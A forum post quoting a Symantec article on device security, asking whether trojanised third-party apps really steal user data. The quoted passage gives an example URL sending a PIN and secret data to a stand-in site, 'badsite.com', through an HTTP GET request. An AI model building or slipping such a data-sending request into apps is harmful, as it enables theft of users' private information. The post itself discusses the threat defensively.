I was reading the following article posted by Symantec:
http://www.symantec.com/avcenter/ref...ry.devices.pdf
I found one section to be quite scary:
Data Theft
A user installs some apparently useful application or video game. The application steals the user's informa-
tion and the information is passed to the attacker via a HTTP GET request. I.e.:
http://www.badsite.com/upload?&PIN=9...his+is+top+sec
ret+data
Anybody up on the level of actual attacks downloading third party applications and allowing User Data to be exploited?